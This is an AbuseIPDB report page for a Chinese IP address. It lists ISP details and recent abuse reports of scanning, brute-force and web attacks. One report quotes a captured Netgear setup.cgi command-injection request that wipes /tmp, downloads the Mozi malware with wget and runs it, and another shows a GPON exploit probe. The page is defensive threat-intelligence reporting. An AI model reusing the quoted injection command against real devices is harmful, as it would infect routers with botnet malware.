JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 120.238.189.72

120.238.189.72 was found in our database!

This IP was reported 778 times. Confidence of Abuse is 0%: ?

ISP	China Mobile Communications Corporation
Usage Type	Fixed Line ISP
ASN	AS9808
Domain Name	chinamobile.com
Country	🇨🇳 China
City	Guangzhou, Guangdong

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 120.238.189.72

Whois 120.238.189.72

IP Abuse Reports for 120.238.189.72:

This IP address has been reported a total of 778 times from 122 distinct sources. 120.238.189.72 was first reported on October 11th 2021, and the most recent report was 2 months ago.

Old Reports: The most recent abuse report for this IP address is from 2 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇩 Diskominfo Lumajang	2026-04-11 21:10:07 (2 months ago)	Security Event Detected by SOC Diskominfo Lumajang: event=alert, hits=2	Brute-Force
🇮🇩 Diskominfo Lumajang	2026-04-10 21:05:09 (2 months ago)	Security Event Detected by SOC Diskominfo Lumajang: event=alert, hits=2	Brute-Force
🇮🇩 Diskominfo Lumajang	2026-04-08 21:05:06 (2 months ago)	Security Event Detected by SOC Diskominfo Lumajang: event=alert, hits=2	Brute-Force
🇨🇦 polycoda	2026-04-07 14:17:18 (2 months ago)	AutoBlock: 📡 Port Scan (Non Decay-Based)	Port Scan
🇺🇸 donarev419	2026-04-05 01:09:14 (2 months ago)	Connection to port 80 with data transfer. Data preview: POST /GponForm/diag_Form?images/ HTTP/1.1 H ... show more Connection to port 80 with data transfer. Data preview: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 127.0.0.1:80 Connection: keep-alive Accept-Encodi show less	Port Scan Hacking
🇩🇪 cloudmax	2026-03-29 06:20:30 (2 months ago)	Cloudmax IPS Block - Suspicious activity. Possible port scanning, service reconnaissance, or vulnera ... show more Cloudmax IPS Block - Suspicious activity. Possible port scanning, service reconnaissance, or vulnerability probing show less	Port Scan
Anonymous	2026-03-28 05:42:02 (2 months ago)	Blocked by UFW (TCP on 49152) Source port: 33235 TTL: 54 Packet length: 60 TOS: 0x14 This report (f ... show more Blocked by UFW (TCP on 49152) Source port: 33235 TTL: 54 Packet length: 60 TOS: 0x14 This report (for 120.238.189.72) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇧🇷 ICS Labs	2026-03-12 13:06:59 (3 months ago)	ICS Labs Firewall blocked outbound connection from host to known malware IP 120.238.189.72:15180 (Ch ... show more ICS Labs Firewall blocked outbound connection from host to known malware IP 120.238.189.72:15180 (China). show less	Hacking Exploited Host
🇵🇱 nfsec.pl	2026-03-06 16:49:00 (3 months ago)	Detected: TCP scan on port: 8080 with flags: SYN	Port Scan
Anonymous	2026-03-04 05:42:12 (3 months ago)	Hit honeypot r.	Port Scan Hacking Exploited Host
🇷🇸 Scan	2026-02-20 00:09:03 (4 months ago)	MultiHost/MultiPort Probe, Scan, Hack -	Port Scan Hacking
🇺🇸 MPL	2026-02-19 03:49:55 (4 months ago)	tcp/80 (4 or more attempts)	Port Scan
🇷🇸 Scan	2026-02-18 00:47:39 (4 months ago)	MultiHost/MultiPort Probe, Scan, Hack -	Port Scan Hacking
🇨🇳 ThreatBook.io	2026-01-25 22:58:31 (5 months ago)	ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/120.238.189.72 2026 ... show more ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/120.238.189.72 2026-01-25 00:29:31 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://120.238.189.72:58953/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 show less	Web App Attack
🇩🇪 _ArminS_	2026-01-24 20:17:14 (5 months ago)	WEB-Scan 56360:80 detected 2026.01.24 21:17:14 blocked until 2026.03.15 14:20:01	Port Scan

Showing 1 to 15 of 778 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 162.216.149.74

🇫🇷 194.163.150.184

🇦🇷 190.172.99.89

🇺🇸 162.216.149.218

🇮🇹 151.95.211.132

🇫🇷 85.217.140.1

🇫🇮 65.108.91.14

🇨🇳 49.70.25.234

🇷🇺 213.180.203.223

🇦🇷 181.116.220.251

🇲🇦 160.174.129.232

🇵🇭 149.30.146.146

🇦🇺 125.254.84.244

🇰🇷 110.35.12.15

🇫🇷 80.13.70.76

🇬🇧 35.203.211.196

🇦🇺 125.254.84.245

🇯🇵 124.100.131.160

🇳🇱 51.158.248.123

🇳🇵 49.244.92.254